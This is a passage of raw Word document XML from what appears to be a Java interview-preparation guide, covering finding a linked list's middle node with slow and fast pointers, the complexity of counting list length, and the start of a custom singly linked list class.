        </w:num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To find the middle element of a </w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>singly linked list without calculating its length</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, use the </w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tortoise and Hare (Slow and Fast Pointer)</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> approach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB6CB56" w14:textId="77777777" w:rsidR="00291D8E" w:rsidRPr="004E1F60" w:rsidRDefault="00291D8E" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA3AB36" w14:textId="77777777" w:rsidR="00291D8E" w:rsidRPr="004E1F60" w:rsidRDefault="00291D8E" w:rsidP="004E1F60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1821"/>
        </w:num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Use two pointers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EC11F4" w14:textId="77777777" w:rsidR="00291D8E" w:rsidRPr="004E1F60" w:rsidRDefault="00291D8E" w:rsidP="004E1F60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1821"/>
        </w:num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slow moves one step at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1679A798" w14:textId="77777777" w:rsidR="00291D8E" w:rsidRPr="004E1F60" w:rsidRDefault="00291D8E" w:rsidP="004E1F60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1821"/>
        </w:num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fast moves two steps at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541F1F8D" w14:textId="77777777" w:rsidR="00291D8E" w:rsidRPr="004E1F60" w:rsidRDefault="00291D8E" w:rsidP="004E1F60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1821"/>
        </w:num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When fast reaches the end, slow will be at the middle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490A39F1" w14:textId="77777777" w:rsidR="00291D8E" w:rsidRPr="004E1F60" w:rsidRDefault="00291D8E" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285DA499"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class Node {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B805774"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int data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A7B6C2"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Node next;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1B2477"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Node(int data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3252C9F7"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this.data = data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1ACF50"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this.next = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78900DF2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4973ED9B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6F3456" w14:textId="77777777" w:rsidR="00291D8E" w:rsidRPr="004E1F60" w:rsidRDefault="00291D8E" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6837D00F"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public class LinkedListMiddle {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4035C35D"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public static Node findMiddle(Node head) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6994A08C"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if (head == null) return null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E00BEE" w14:textId="77777777" w:rsidR="00291D8E" w:rsidRPr="004E1F60" w:rsidRDefault="00291D8E" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F36609B"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Node slow = head;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64250E85"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Node fast = head;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAAFA06" w14:textId="77777777" w:rsidR="00291D8E" w:rsidRPr="004E1F60" w:rsidRDefault="00291D8E" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4646C618"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while (fast != null &amp;&amp; fast.next != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242A61C2"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slow = slow.next;         // move one step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F51D8E"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fast = fast.next.next;    // move two steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7B8E67"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2512D9A4" w14:textId="77777777" w:rsidR="00291D8E" w:rsidRPr="004E1F60" w:rsidRDefault="00291D8E" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F342259"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return slow; // slow is now at the middle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E168BE4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7201A8AE" w14:textId="77777777" w:rsidR="00291D8E" w:rsidRPr="004E1F60" w:rsidRDefault="00291D8E" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44B108FB"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B26311"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Node head = new Node(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148F73DF"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head.next = new Node(2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5CECAE"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head.next.next = new Node(3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF0B1AB"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head.next.next.next = new Node(4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DCBA87"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head.next.next.next.next = new Node(5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEC7281" w14:textId="77777777" w:rsidR="00291D8E" w:rsidRPr="004E1F60" w:rsidRDefault="00291D8E" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CF1B82C"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Node middle = findMiddle(head);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50334CD2"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System.out.println("Middle element: " + middle.data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B16F026"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A07D62C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B00CD5" w14:textId="77777777" w:rsidR="00291D8E" w:rsidRPr="004E1F60" w:rsidRDefault="00291D8E" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E91FB8"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Middle element: 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5772B59A" w14:textId="77777777" w:rsidR="00291D8E" w:rsidRPr="004E1F60" w:rsidRDefault="00291D8E"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If the list has an even number of nodes, this will return the </w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>second middle element</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DDF2FB" w14:textId="4032E762" w:rsidR="00D86B77" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D86B7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4112130">
          <v:rect id="_x0000_i1988" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C5F99E" w14:textId="33317C9D" w:rsidR="00246C6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00246C6D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="410" w:name="_Toc196307890"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Complexity to find length of singly linked list?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="410"/>
    </w:p>
    <w:p w14:paraId="4B1AA27D" w14:textId="20096182" w:rsidR="00B86304" w:rsidRPr="004E1F60" w:rsidRDefault="00B86304" w:rsidP="004E1F60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Time and Space Complexity to Find Length of Singly Linked List:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D86090" w14:textId="77777777" w:rsidR="00B86304" w:rsidRPr="004E1F60" w:rsidRDefault="00B86304" w:rsidP="004E1F60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1822"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Time Complexity:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> O(n)</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>You need to traverse all n nodes from head to end to count the length.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FD5546" w14:textId="77777777" w:rsidR="00B86304" w:rsidRPr="004E1F60" w:rsidRDefault="00B86304" w:rsidP="004E1F60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1822"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Space Complexity:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> O(1)</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Only a constant number of variables (like a counter and a pointer) are used during traversal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBD138D" w14:textId="77777777" w:rsidR="00B86304" w:rsidRPr="004E1F60" w:rsidRDefault="00B86304" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA4001B" w14:textId="77777777" w:rsidR="00B86304" w:rsidRPr="004E1F60" w:rsidRDefault="00B86304"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public int getLength(Node head) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A4FD9F" w14:textId="77777777" w:rsidR="00B86304" w:rsidRPr="004E1F60" w:rsidRDefault="00B86304"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int count = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A2B998" w14:textId="77777777" w:rsidR="00B86304" w:rsidRPr="004E1F60" w:rsidRDefault="00B86304"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while (head != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB6C739" w14:textId="77777777" w:rsidR="00B86304" w:rsidRPr="004E1F60" w:rsidRDefault="00B86304"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count++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4105A8BA" w14:textId="77777777" w:rsidR="00B86304" w:rsidRPr="004E1F60" w:rsidRDefault="00B86304"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head = head.next;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1126CB4E" w14:textId="77777777" w:rsidR="00B86304" w:rsidRPr="004E1F60" w:rsidRDefault="00B86304"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185219C0" w14:textId="77777777" w:rsidR="00B86304" w:rsidRPr="004E1F60" w:rsidRDefault="00B86304"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return count;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B286E3" w14:textId="77777777" w:rsidR="00B86304" w:rsidRPr="004E1F60" w:rsidRDefault="00B86304"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BED656A" w14:textId="77777777" w:rsidR="00B86304" w:rsidRPr="004E1F60" w:rsidRDefault="00B86304"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Only one pass is needed, so the time is linear and space remains constant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56853D51" w14:textId="6D9CFC23" w:rsidR="00D86B77" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D86B7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72D3D80">
          <v:rect id="_x0000_i1989" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A80B06D" w14:textId="68D5D9CE" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="00D33510">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="411" w:name="_Toc196307891"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Do you know how LinkedList works? Can you create a data structure for LinkedList</w:t>
      </w:r>
      <w:r w:rsidR="00E74B00" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="411"/>
    </w:p>
    <w:p w14:paraId="3ED79B3E" w14:textId="3003651A" w:rsidR="00315CE3" w:rsidRPr="004E1F60" w:rsidRDefault="00315CE3" w:rsidP="004E1F60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Yes, a </w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LinkedList</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a linear data structure where each element (called a node) contains:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706B6473" w14:textId="77777777" w:rsidR="00315CE3" w:rsidRPr="004E1F60" w:rsidRDefault="00315CE3" w:rsidP="004E1F60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1823"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Data</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The actual value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F98231" w14:textId="77777777" w:rsidR="00315CE3" w:rsidRPr="004E1F60" w:rsidRDefault="00315CE3" w:rsidP="004E1F60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1823"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Pointer</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A reference to the next node (for singly linked list) or next and previous (for doubly linked list).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190479BB" w14:textId="77777777" w:rsidR="00315CE3" w:rsidRPr="004E1F60" w:rsidRDefault="00000000" w:rsidP="004E1F6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DC94E8F">
          <v:rect id="_x0000_i1990" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBEABEF" w14:textId="77777777" w:rsidR="00315CE3" w:rsidRPr="004E1F60" w:rsidRDefault="00315CE3" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Singly Linked List – Custom Implementation in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD6E816"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class Node {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B925BED"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int data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DD54F5"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Node next;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E112E3E" w14:textId="77777777" w:rsidR="00315CE3" w:rsidRPr="004E1F60" w:rsidRDefault="00315CE3" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3427E84D"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Node(int data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A079B66"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this.data = data;</w:t>
      </w:r>
    </w:p>
